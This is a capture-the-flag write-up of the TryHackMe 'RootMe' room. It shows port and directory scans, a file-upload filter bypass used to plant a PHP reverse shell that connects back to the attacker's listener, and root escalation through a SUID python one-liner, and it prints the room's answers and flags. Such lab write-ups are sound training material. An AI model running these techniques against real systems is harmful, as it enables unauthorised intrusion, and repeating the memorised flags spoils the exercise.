Date: 17, May, 2021
Author: Dhilip Sanjay S
Click Here to go to the TryHackMe room.
$ nmap -sC -sV 10.10.202.137 -oN nmap.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-17 01:01 IST
Nmap scan report for 10.10.202.137
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.60 seconds- Answer: 2
- Answer: 2.4.29
- Answer: ssh
$ gobuster dir -u http://10.10.202.137 -t 50 -w /usr/share/wordlists/dirb/common.txt | tee gobuster.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.202.137
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/17 01:06:28 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/css (Status: 301) [Size: 312] [--> http://10.10.202.137/css/]
/index.php (Status: 200) [Size: 616]
/js (Status: 301) [Size: 311] [--> http://10.10.202.137/js/]
/panel (Status: 301) [Size: 314] [--> http://10.10.202.137/panel/]
/server-status (Status: 403) [Size: 278]
/uploads (Status: 301) [Size: 316] [--> http://10.10.202.137/uploads/]
===============================================================
2021/05/17 01:06:48 Finished
===============================================================What is the hidden directory?
- Answer: /panel/
- Visit
http://10.10.202.137/panel/.
- Initially, I tried to upload file
php-reverse-shell.php(Don't forget to put your IP and Port in the file), which gave the following output:
PHP não é permitido!
(In Portuguese, which translates to)
PHP is not allowed!
- To bypass the filter, change the file name to
php-reverse-shell.php.jpgand then try uploading:
O arquivo foi upado com sucesso!
(In Portuguese, which translates to)
The file was successfully uploaded!
- Listen on the appropriate port using netcat:
nc -lvnp 1234 - Open the uploaded file in the browser:
http://10.10.202.137/uploads/php-reverse-shell.php.jpg - But unfortunately the image couldn't be opened. So, we need to look for some other filter bypass
- Change the file name to
php-reverse-shell.phtmland upload it.
O arquivo foi upado com sucesso!
(In Portuguese, which translates to)
The file was successfully uploaded!
- Now, visit
http://10.10.202.137/uploads/php-reverse-shell.phtml. - The code was executed and the reverse shell was obtained as the user www-data.
- We'll upgrade it to a stable shell:
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.17.7.91] from (UNKNOWN) [10.10.202.137] 36914
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
19:51:37 up 22 min, 0 users, load average: 0.00, 0.26, 1.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: cant access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
$ ^Z
[1]+ Stopped nc -lvnp 1234
root@kali:~# stty raw -echo; fg
nc -lvnp 1234
www-data@rootme:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)- Answer: THM{y0u_g0t_a_sh3ll}
- Steps to Reproduce:
$ www-data@rootme:/$ find / -type f -name "user.txt" 2>/dev/null
/var/www/user.txt
www-data@rootme:/$ cat /var/www/user.txt
THM{y0u_g0t_a_sh3ll}- Answer: /usr/bin/python
- Steps to Reproduce:
$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount- Look for the exploit in GTFO bins
- Here, we set the UID to 0 (root).
www-data@rootme:/$ python -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=33(www-data) groups=33(www-data)- Answer: THM{pr1v1l3g3_3sc4l4t10n}
- Steps to Reproduce:
# find / -name "root.txt" -type f 2>/dev/null
/root/root.txt
# cd /root
# ls
root.txt
# cat root.txt
THM{pr1v1l3g3_3sc4l4t10n}